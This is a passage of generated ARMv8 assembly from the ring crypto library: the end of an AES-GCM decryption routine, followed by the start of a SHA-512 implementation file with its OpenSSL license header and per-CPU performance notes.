add w12, w12, #1 // CTR block 4
fmov d0, x10 // CTR block 4
orr x9, x11, x9, lsl #32 // CTR block 4
fmov v0.d[1], x9 // CTR block 4
rev w9, w12 // CTR block 5
add w12, w12, #1 // CTR block 5
mov x19, v1.d[0] // AES block 1 - mov low
orr x9, x11, x9, lsl #32 // CTR block 5
mov x20, v1.d[1] // AES block 1 - mov high
eor x7, x7, x14 // AES block 0 - round N high
eor x6, x6, x13 // AES block 0 - round N low
stp x6, x7, [x2], #16 // AES block 0 - store result
fmov d1, x10 // CTR block 5
ldr q6, [x0, #32] // AES block 2 - load ciphertext
add x0, x0, #64 // AES input_ptr update
fmov v1.d[1], x9 // CTR block 5
rev w9, w12 // CTR block 6
add w12, w12, #1 // CTR block 6
eor x19, x19, x13 // AES block 1 - round N low
orr x9, x11, x9, lsl #32 // CTR block 6
eor x20, x20, x14 // AES block 1 - round N high
stp x19, x20, [x2], #16 // AES block 1 - store result
eor v2.16b, v6.16b, v2.16b // AES block 2 - result
cmp x0, x5 // check if we have <= 8 blocks
b.ge Ldec_prepretail // do prepretail
Ldec_main_loop: // main loop start
mov x21, v2.d[0] // AES block 4k+2 - mov low
ext v11.16b, v11.16b, v11.16b, #8 // PRE 0
eor v3.16b, v7.16b, v3.16b // AES block 4k+3 - result
aese v0.16b, v18.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 0
mov x22, v2.d[1] // AES block 4k+2 - mov high
aese v1.16b, v18.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 0
fmov d2, x10 // CTR block 4k+6
fmov v2.d[1], x9 // CTR block 4k+6
eor v4.16b, v4.16b, v11.16b // PRE 1
rev w9, w12 // CTR block 4k+7
aese v0.16b, v19.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 1
mov x24, v3.d[1] // AES block 4k+3 - mov high
aese v1.16b, v19.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 1
mov x23, v3.d[0] // AES block 4k+3 - mov low
pmull2 v9.1q, v4.2d, v15.2d // GHASH block 4k - high
mov d8, v4.d[1] // GHASH block 4k - mid
fmov d3, x10 // CTR block 4k+7
aese v0.16b, v20.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 2
orr x9, x11, x9, lsl #32 // CTR block 4k+7
aese v2.16b, v18.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 0
fmov v3.d[1], x9 // CTR block 4k+7
aese v1.16b, v20.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 2
eor v8.8b, v8.8b, v4.8b // GHASH block 4k - mid
aese v0.16b, v21.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 3
eor x22, x22, x14 // AES block 4k+2 - round N high
aese v2.16b, v19.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 1
mov d10, v17.d[1] // GHASH block 4k - mid
aese v1.16b, v21.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 3
rev64 v6.16b, v6.16b // GHASH block 4k+2
aese v3.16b, v18.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 0
eor x21, x21, x13 // AES block 4k+2 - round N low
aese v2.16b, v20.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 2
stp x21, x22, [x2], #16 // AES block 4k+2 - store result
pmull v11.1q, v4.1d, v15.1d // GHASH block 4k - low
pmull2 v4.1q, v5.2d, v14.2d // GHASH block 4k+1 - high
aese v2.16b, v21.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 3
rev64 v7.16b, v7.16b // GHASH block 4k+3
pmull v10.1q, v8.1d, v10.1d // GHASH block 4k - mid
eor x23, x23, x13 // AES block 4k+3 - round N low
pmull v8.1q, v5.1d, v14.1d // GHASH block 4k+1 - low
eor x24, x24, x14 // AES block 4k+3 - round N high
eor v9.16b, v9.16b, v4.16b // GHASH block 4k+1 - high
aese v2.16b, v22.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 4
aese v3.16b, v19.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 1
mov d4, v5.d[1] // GHASH block 4k+1 - mid
aese v0.16b, v22.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 4
eor v11.16b, v11.16b, v8.16b // GHASH block 4k+1 - low
aese v2.16b, v23.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 5
add w12, w12, #1 // CTR block 4k+7
aese v3.16b, v20.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 2
mov d8, v6.d[1] // GHASH block 4k+2 - mid
aese v1.16b, v22.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 4
eor v4.8b, v4.8b, v5.8b // GHASH block 4k+1 - mid
pmull v5.1q, v6.1d, v13.1d // GHASH block 4k+2 - low
aese v3.16b, v21.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 3
eor v8.8b, v8.8b, v6.8b // GHASH block 4k+2 - mid
aese v1.16b, v23.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 5
aese v0.16b, v23.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 5
eor v11.16b, v11.16b, v5.16b // GHASH block 4k+2 - low
pmull v4.1q, v4.1d, v17.1d // GHASH block 4k+1 - mid
rev w9, w12 // CTR block 4k+8
aese v1.16b, v24.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 6
ins v8.d[1], v8.d[0] // GHASH block 4k+2 - mid
aese v0.16b, v24.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 6
add w12, w12, #1 // CTR block 4k+8
aese v3.16b, v22.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 4
aese v1.16b, v25.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 7
eor v10.16b, v10.16b, v4.16b // GHASH block 4k+1 - mid
aese v0.16b, v25.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 7
pmull2 v4.1q, v6.2d, v13.2d // GHASH block 4k+2 - high
mov d6, v7.d[1] // GHASH block 4k+3 - mid
aese v3.16b, v23.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 5
pmull2 v8.1q, v8.2d, v16.2d // GHASH block 4k+2 - mid
aese v0.16b, v26.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 8
eor v9.16b, v9.16b, v4.16b // GHASH block 4k+2 - high
aese v3.16b, v24.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 6
pmull v4.1q, v7.1d, v12.1d // GHASH block 4k+3 - low
orr x9, x11, x9, lsl #32 // CTR block 4k+8
eor v10.16b, v10.16b, v8.16b // GHASH block 4k+2 - mid
pmull2 v5.1q, v7.2d, v12.2d // GHASH block 4k+3 - high
cmp x17, #12 // setup flags for AES-128/192/256 check
eor v6.8b, v6.8b, v7.8b // GHASH block 4k+3 - mid
aese v1.16b, v26.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 8
aese v2.16b, v24.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 6
eor v9.16b, v9.16b, v5.16b // GHASH block 4k+3 - high
pmull v6.1q, v6.1d, v16.1d // GHASH block 4k+3 - mid
movi v8.8b, #0xc2
aese v2.16b, v25.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 7
eor v11.16b, v11.16b, v4.16b // GHASH block 4k+3 - low
aese v3.16b, v25.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 7
shl d8, d8, #56 // mod_constant
aese v2.16b, v26.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 8
eor v10.16b, v10.16b, v6.16b // GHASH block 4k+3 - mid
aese v3.16b, v26.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 8
b.lt Ldec_main_loop_continue // branch if AES-128
aese v0.16b, v27.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 9
aese v2.16b, v27.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 9
aese v1.16b, v27.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 9
aese v3.16b, v27.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 9
aese v0.16b, v28.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 10
aese v1.16b, v28.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 10
aese v2.16b, v28.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 10
aese v3.16b, v28.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 10
b.eq Ldec_main_loop_continue // branch if AES-192
aese v0.16b, v29.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 11
aese v1.16b, v29.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 11
aese v2.16b, v29.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 11
aese v3.16b, v29.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 11
aese v0.16b, v30.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 12
aese v1.16b, v30.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 12
aese v2.16b, v30.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 12
aese v3.16b, v30.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 12
Ldec_main_loop_continue:
pmull v7.1q, v9.1d, v8.1d // MODULO - top 64b align with mid
eor v6.16b, v11.16b, v9.16b // MODULO - karatsuba tidy up
ldr q4, [x0, #0] // AES block 4k+4 - load ciphertext
aese v0.16b, v31.16b // AES block 4k+4 - round N-1
ext v9.16b, v9.16b, v9.16b, #8 // MODULO - other top alignment
eor v10.16b, v10.16b, v6.16b // MODULO - karatsuba tidy up
ldr q5, [x0, #16] // AES block 4k+5 - load ciphertext
eor v0.16b, v4.16b, v0.16b // AES block 4k+4 - result
stp x23, x24, [x2], #16 // AES block 4k+3 - store result
eor v10.16b, v10.16b, v7.16b // MODULO - fold into mid
ldr q7, [x0, #48] // AES block 4k+7 - load ciphertext
ldr q6, [x0, #32] // AES block 4k+6 - load ciphertext
mov x7, v0.d[1] // AES block 4k+4 - mov high
eor v10.16b, v10.16b, v9.16b // MODULO - fold into mid
aese v1.16b, v31.16b // AES block 4k+5 - round N-1
add x0, x0, #64 // AES input_ptr update
mov x6, v0.d[0] // AES block 4k+4 - mov low
fmov d0, x10 // CTR block 4k+8
fmov v0.d[1], x9 // CTR block 4k+8
pmull v8.1q, v10.1d, v8.1d // MODULO - mid 64b align with low
eor v1.16b, v5.16b, v1.16b // AES block 4k+5 - result
rev w9, w12 // CTR block 4k+9
aese v2.16b, v31.16b // AES block 4k+6 - round N-1
orr x9, x11, x9, lsl #32 // CTR block 4k+9
cmp x0, x5 // LOOP CONTROL
add w12, w12, #1 // CTR block 4k+9
eor x6, x6, x13 // AES block 4k+4 - round N low
eor x7, x7, x14 // AES block 4k+4 - round N high
mov x20, v1.d[1] // AES block 4k+5 - mov high
eor v2.16b, v6.16b, v2.16b // AES block 4k+6 - result
eor v11.16b, v11.16b, v8.16b // MODULO - fold into low
mov x19, v1.d[0] // AES block 4k+5 - mov low
fmov d1, x10 // CTR block 4k+9
ext v10.16b, v10.16b, v10.16b, #8 // MODULO - other mid alignment
fmov v1.d[1], x9 // CTR block 4k+9
rev w9, w12 // CTR block 4k+10
add w12, w12, #1 // CTR block 4k+10
aese v3.16b, v31.16b // AES block 4k+7 - round N-1
orr x9, x11, x9, lsl #32 // CTR block 4k+10
rev64 v5.16b, v5.16b // GHASH block 4k+5
eor x20, x20, x14 // AES block 4k+5 - round N high
stp x6, x7, [x2], #16 // AES block 4k+4 - store result
eor x19, x19, x13 // AES block 4k+5 - round N low
stp x19, x20, [x2], #16 // AES block 4k+5 - store result
rev64 v4.16b, v4.16b // GHASH block 4k+4
eor v11.16b, v11.16b, v10.16b // MODULO - fold into low
b.lt Ldec_main_loop
Ldec_prepretail: // PREPRETAIL
ext v11.16b, v11.16b, v11.16b, #8 // PRE 0
mov x21, v2.d[0] // AES block 4k+2 - mov low
eor v3.16b, v7.16b, v3.16b // AES block 4k+3 - result
aese v0.16b, v18.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 0
mov x22, v2.d[1] // AES block 4k+2 - mov high
aese v1.16b, v18.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 0
fmov d2, x10 // CTR block 4k+6
fmov v2.d[1], x9 // CTR block 4k+6
rev w9, w12 // CTR block 4k+7
eor v4.16b, v4.16b, v11.16b // PRE 1
rev64 v6.16b, v6.16b // GHASH block 4k+2
orr x9, x11, x9, lsl #32 // CTR block 4k+7
mov x23, v3.d[0] // AES block 4k+3 - mov low
aese v1.16b, v19.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 1
mov x24, v3.d[1] // AES block 4k+3 - mov high
pmull v11.1q, v4.1d, v15.1d // GHASH block 4k - low
mov d8, v4.d[1] // GHASH block 4k - mid
fmov d3, x10 // CTR block 4k+7
pmull2 v9.1q, v4.2d, v15.2d // GHASH block 4k - high
fmov v3.d[1], x9 // CTR block 4k+7
aese v2.16b, v18.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 0
mov d10, v17.d[1] // GHASH block 4k - mid
aese v0.16b, v19.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 1
eor v8.8b, v8.8b, v4.8b // GHASH block 4k - mid
pmull2 v4.1q, v5.2d, v14.2d // GHASH block 4k+1 - high
aese v2.16b, v19.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 1
rev64 v7.16b, v7.16b // GHASH block 4k+3
aese v3.16b, v18.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 0
pmull v10.1q, v8.1d, v10.1d // GHASH block 4k - mid
eor v9.16b, v9.16b, v4.16b // GHASH block 4k+1 - high
pmull v8.1q, v5.1d, v14.1d // GHASH block 4k+1 - low
aese v3.16b, v19.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 1
mov d4, v5.d[1] // GHASH block 4k+1 - mid
aese v0.16b, v20.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 2
aese v1.16b, v20.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 2
eor v11.16b, v11.16b, v8.16b // GHASH block 4k+1 - low
aese v2.16b, v20.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 2
aese v0.16b, v21.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 3
mov d8, v6.d[1] // GHASH block 4k+2 - mid
aese v3.16b, v20.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 2
eor v4.8b, v4.8b, v5.8b // GHASH block 4k+1 - mid
pmull v5.1q, v6.1d, v13.1d // GHASH block 4k+2 - low
aese v0.16b, v22.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 4
aese v3.16b, v21.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 3
eor v8.8b, v8.8b, v6.8b // GHASH block 4k+2 - mid
pmull v4.1q, v4.1d, v17.1d // GHASH block 4k+1 - mid
aese v0.16b, v23.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 5
eor v11.16b, v11.16b, v5.16b // GHASH block 4k+2 - low
aese v3.16b, v22.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 4
pmull2 v5.1q, v7.2d, v12.2d // GHASH block 4k+3 - high
eor v10.16b, v10.16b, v4.16b // GHASH block 4k+1 - mid
pmull2 v4.1q, v6.2d, v13.2d // GHASH block 4k+2 - high
aese v3.16b, v23.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 5
ins v8.d[1], v8.d[0] // GHASH block 4k+2 - mid
aese v2.16b, v21.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 3
aese v1.16b, v21.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 3
eor v9.16b, v9.16b, v4.16b // GHASH block 4k+2 - high
pmull v4.1q, v7.1d, v12.1d // GHASH block 4k+3 - low
aese v2.16b, v22.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 4
mov d6, v7.d[1] // GHASH block 4k+3 - mid
aese v1.16b, v22.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 4
pmull2 v8.1q, v8.2d, v16.2d // GHASH block 4k+2 - mid
aese v2.16b, v23.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 5
eor v6.8b, v6.8b, v7.8b // GHASH block 4k+3 - mid
aese v1.16b, v23.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 5
aese v3.16b, v24.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 6
eor v10.16b, v10.16b, v8.16b // GHASH block 4k+2 - mid
aese v2.16b, v24.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 6
aese v0.16b, v24.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 6
movi v8.8b, #0xc2
aese v1.16b, v24.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 6
eor v11.16b, v11.16b, v4.16b // GHASH block 4k+3 - low
pmull v6.1q, v6.1d, v16.1d // GHASH block 4k+3 - mid
aese v3.16b, v25.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 7
cmp x17, #12 // setup flags for AES-128/192/256 check
eor v9.16b, v9.16b, v5.16b // GHASH block 4k+3 - high
aese v1.16b, v25.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 7
aese v0.16b, v25.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 7
eor v10.16b, v10.16b, v6.16b // GHASH block 4k+3 - mid
aese v3.16b, v26.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 8
aese v2.16b, v25.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 7
eor v6.16b, v11.16b, v9.16b // MODULO - karatsuba tidy up
aese v1.16b, v26.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 8
aese v0.16b, v26.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 8
shl d8, d8, #56 // mod_constant
aese v2.16b, v26.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 8
b.lt Ldec_finish_prepretail // branch if AES-128
aese v1.16b, v27.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 9
aese v2.16b, v27.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 9
aese v3.16b, v27.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 9
aese v0.16b, v27.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 9
aese v2.16b, v28.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 10
aese v3.16b, v28.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 10
aese v0.16b, v28.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 10
aese v1.16b, v28.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 10
b.eq Ldec_finish_prepretail // branch if AES-192
aese v2.16b, v29.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 11
aese v0.16b, v29.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 11
aese v1.16b, v29.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 11
aese v2.16b, v30.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 12
aese v3.16b, v29.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 11
aese v1.16b, v30.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 12
aese v0.16b, v30.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 12
aese v3.16b, v30.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 12
Ldec_finish_prepretail:
eor v10.16b, v10.16b, v6.16b // MODULO - karatsuba tidy up
pmull v7.1q, v9.1d, v8.1d // MODULO - top 64b align with mid
ext v9.16b, v9.16b, v9.16b, #8 // MODULO - other top alignment
eor v10.16b, v10.16b, v7.16b // MODULO - fold into mid
eor x22, x22, x14 // AES block 4k+2 - round N high
eor x23, x23, x13 // AES block 4k+3 - round N low
eor v10.16b, v10.16b, v9.16b // MODULO - fold into mid
add w12, w12, #1 // CTR block 4k+7
eor x21, x21, x13 // AES block 4k+2 - round N low
pmull v8.1q, v10.1d, v8.1d // MODULO - mid 64b align with low
eor x24, x24, x14 // AES block 4k+3 - round N high
stp x21, x22, [x2], #16 // AES block 4k+2 - store result
ext v10.16b, v10.16b, v10.16b, #8 // MODULO - other mid alignment
stp x23, x24, [x2], #16 // AES block 4k+3 - store result
eor v11.16b, v11.16b, v8.16b // MODULO - fold into low
aese v1.16b, v31.16b // AES block 4k+5 - round N-1
aese v0.16b, v31.16b // AES block 4k+4 - round N-1
aese v3.16b, v31.16b // AES block 4k+7 - round N-1
aese v2.16b, v31.16b // AES block 4k+6 - round N-1
eor v11.16b, v11.16b, v10.16b // MODULO - fold into low
Ldec_tail: // TAIL
sub x5, x4, x0 // main_end_input_ptr is number of bytes left to process
ld1 { v5.16b}, [x0], #16 // AES block 4k+4 - load ciphertext
eor v0.16b, v5.16b, v0.16b // AES block 4k+4 - result
mov x6, v0.d[0] // AES block 4k+4 - mov low
mov x7, v0.d[1] // AES block 4k+4 - mov high
ext v8.16b, v11.16b, v11.16b, #8 // prepare final partial tag
cmp x5, #48
eor x6, x6, x13 // AES block 4k+4 - round N low
eor x7, x7, x14 // AES block 4k+4 - round N high
b.gt Ldec_blocks_more_than_3
sub w12, w12, #1
mov v3.16b, v2.16b
movi v10.8b, #0
movi v11.8b, #0
cmp x5, #32
movi v9.8b, #0
mov v2.16b, v1.16b
b.gt Ldec_blocks_more_than_2
sub w12, w12, #1
mov v3.16b, v1.16b
cmp x5, #16
b.gt Ldec_blocks_more_than_1
sub w12, w12, #1
b Ldec_blocks_less_than_1
Ldec_blocks_more_than_3: // blocks left > 3
rev64 v4.16b, v5.16b // GHASH final-3 block
ld1 { v5.16b}, [x0], #16 // AES final-2 block - load ciphertext
stp x6, x7, [x2], #16 // AES final-3 block - store result
mov d10, v17.d[1] // GHASH final-3 block - mid
eor v4.16b, v4.16b, v8.16b // feed in partial tag
eor v0.16b, v5.16b, v1.16b // AES final-2 block - result
mov d22, v4.d[1] // GHASH final-3 block - mid
mov x6, v0.d[0] // AES final-2 block - mov low
mov x7, v0.d[1] // AES final-2 block - mov high
eor v22.8b, v22.8b, v4.8b // GHASH final-3 block - mid
movi v8.8b, #0 // suppress further partial tag feed in
pmull2 v9.1q, v4.2d, v15.2d // GHASH final-3 block - high
pmull v10.1q, v22.1d, v10.1d // GHASH final-3 block - mid
eor x6, x6, x13 // AES final-2 block - round N low
pmull v11.1q, v4.1d, v15.1d // GHASH final-3 block - low
eor x7, x7, x14 // AES final-2 block - round N high
Ldec_blocks_more_than_2: // blocks left > 2
rev64 v4.16b, v5.16b // GHASH final-2 block
ld1 { v5.16b}, [x0], #16 // AES final-1 block - load ciphertext
eor v4.16b, v4.16b, v8.16b // feed in partial tag
stp x6, x7, [x2], #16 // AES final-2 block - store result
eor v0.16b, v5.16b, v2.16b // AES final-1 block - result
mov d22, v4.d[1] // GHASH final-2 block - mid
pmull v21.1q, v4.1d, v14.1d // GHASH final-2 block - low
pmull2 v20.1q, v4.2d, v14.2d // GHASH final-2 block - high
eor v22.8b, v22.8b, v4.8b // GHASH final-2 block - mid
mov x6, v0.d[0] // AES final-1 block - mov low
mov x7, v0.d[1] // AES final-1 block - mov high
eor v11.16b, v11.16b, v21.16b // GHASH final-2 block - low
movi v8.8b, #0 // suppress further partial tag feed in
pmull v22.1q, v22.1d, v17.1d // GHASH final-2 block - mid
eor v9.16b, v9.16b, v20.16b // GHASH final-2 block - high
eor x6, x6, x13 // AES final-1 block - round N low
eor v10.16b, v10.16b, v22.16b // GHASH final-2 block - mid
eor x7, x7, x14 // AES final-1 block - round N high
Ldec_blocks_more_than_1: // blocks left > 1
stp x6, x7, [x2], #16 // AES final-1 block - store result
rev64 v4.16b, v5.16b // GHASH final-1 block
ld1 { v5.16b}, [x0], #16 // AES final block - load ciphertext
eor v4.16b, v4.16b, v8.16b // feed in partial tag
movi v8.8b, #0 // suppress further partial tag feed in
mov d22, v4.d[1] // GHASH final-1 block - mid
eor v0.16b, v5.16b, v3.16b // AES final block - result
pmull2 v20.1q, v4.2d, v13.2d // GHASH final-1 block - high
eor v22.8b, v22.8b, v4.8b // GHASH final-1 block - mid
pmull v21.1q, v4.1d, v13.1d // GHASH final-1 block - low
mov x6, v0.d[0] // AES final block - mov low
ins v22.d[1], v22.d[0] // GHASH final-1 block - mid
mov x7, v0.d[1] // AES final block - mov high
pmull2 v22.1q, v22.2d, v16.2d // GHASH final-1 block - mid
eor x6, x6, x13 // AES final block - round N low
eor v11.16b, v11.16b, v21.16b // GHASH final-1 block - low
eor v9.16b, v9.16b, v20.16b // GHASH final-1 block - high
eor v10.16b, v10.16b, v22.16b // GHASH final-1 block - mid
eor x7, x7, x14 // AES final block - round N high
Ldec_blocks_less_than_1: // blocks left <= 1
and x1, x1, #127 // bit_length %= 128
mvn x14, xzr // rkN_h = 0xffffffffffffffff
sub x1, x1, #128 // bit_length -= 128
mvn x13, xzr // rkN_l = 0xffffffffffffffff
ldp x4, x5, [x2] // load existing bytes we need to not overwrite
neg x1, x1 // bit_length = 128 - #bits in input (in range [1,128])
and x1, x1, #127 // bit_length %= 128
lsr x14, x14, x1 // rkN_h is mask for top 64b of last block
cmp x1, #64
csel x9, x13, x14, lt
csel x10, x14, xzr, lt
fmov d0, x9 // ctr0b is mask for last block
and x6, x6, x9
mov v0.d[1], x10
bic x4, x4, x9 // mask out low existing bytes
rev w9, w12
bic x5, x5, x10 // mask out high existing bytes
orr x6, x6, x4
and x7, x7, x10
orr x7, x7, x5
and v5.16b, v5.16b, v0.16b // possibly partial last block has zeroes in highest bits
rev64 v4.16b, v5.16b // GHASH final block
eor v4.16b, v4.16b, v8.16b // feed in partial tag
pmull v21.1q, v4.1d, v12.1d // GHASH final block - low
mov d8, v4.d[1] // GHASH final block - mid
eor v8.8b, v8.8b, v4.8b // GHASH final block - mid
pmull2 v20.1q, v4.2d, v12.2d // GHASH final block - high
pmull v8.1q, v8.1d, v16.1d // GHASH final block - mid
eor v9.16b, v9.16b, v20.16b // GHASH final block - high
eor v11.16b, v11.16b, v21.16b // GHASH final block - low
eor v10.16b, v10.16b, v8.16b // GHASH final block - mid
movi v8.8b, #0xc2
eor v6.16b, v11.16b, v9.16b // MODULO - karatsuba tidy up
shl d8, d8, #56 // mod_constant
eor v10.16b, v10.16b, v6.16b // MODULO - karatsuba tidy up
pmull v7.1q, v9.1d, v8.1d // MODULO - top 64b align with mid
ext v9.16b, v9.16b, v9.16b, #8 // MODULO - other top alignment
eor v10.16b, v10.16b, v7.16b // MODULO - fold into mid
eor v10.16b, v10.16b, v9.16b // MODULO - fold into mid
pmull v8.1q, v10.1d, v8.1d // MODULO - mid 64b align with low
ext v10.16b, v10.16b, v10.16b, #8 // MODULO - other mid alignment
eor v11.16b, v11.16b, v8.16b // MODULO - fold into low
stp x6, x7, [x2]
str w9, [x16, #12] // store the updated counter
eor v11.16b, v11.16b, v10.16b // MODULO - fold into low
ext v11.16b, v11.16b, v11.16b, #8
rev64 v11.16b, v11.16b
mov x0, x15
st1 { v11.16b }, [x3]
ldp x19, x20, [sp, #16]
ldp x21, x22, [sp, #32]
ldp x23, x24, [sp, #48]
ldp d8, d9, [sp, #64]
ldp d10, d11, [sp, #80]
ldp d12, d13, [sp, #96]
ldp d14, d15, [sp, #112]
ldp x29, x30, [sp], #128
AARCH64_VALIDATE_LINK_REGISTER
ret
#endif
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_AARCH64) && defined(__APPLE__)
|
mi2bjss/Pressel-site | 49,024 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/sha512-armv8-ios64.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_AARCH64) && defined(__APPLE__)
// Copyright 2014-2020 The OpenSSL Project Authors. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// https://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// ====================================================================
// Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
// project.
// ====================================================================
//
// SHA256/512 for ARMv8.
//
// Performance in cycles per processed byte and improvement coefficient
// over code generated with "default" compiler:
//
// SHA256-hw SHA256(*) SHA512
// Apple A7 1.97 10.5 (+33%) 6.73 (-1%(**))
// Cortex-A53 2.38 15.5 (+115%) 10.0 (+150%(***))
// Cortex-A57 2.31 11.6 (+86%) 7.51 (+260%(***))
// Denver 2.01 10.5 (+26%) 6.70 (+8%)
// X-Gene 20.0 (+100%) 12.8 (+300%(***))
// Mongoose 2.36 13.0 (+50%) 8.36 (+33%)
// Kryo 1.92 17.4 (+30%) 11.2 (+8%)
//
// (*) Software SHA256 results are of lesser relevance, presented
// mostly for informational purposes.
// (**) The result is a trade-off: it's possible to improve it by
// 10% (or by 1 cycle per round), but at the cost of 20% loss
// on Cortex-A53 (or by 4 cycles per round).
// (***) Super-impressive coefficients over gcc-generated code are
// indication of some compiler "pathology", most notably code
// generated with -mgeneral-regs-only is significantly faster
// and the gap is only 40-90%.
#ifndef __KERNEL__
#endif
.text
.globl _sha512_block_data_order_nohw
.private_extern _sha512_block_data_order_nohw
.align 6
_sha512_block_data_order_nohw:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-128]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
stp x25,x26,[sp,#64]
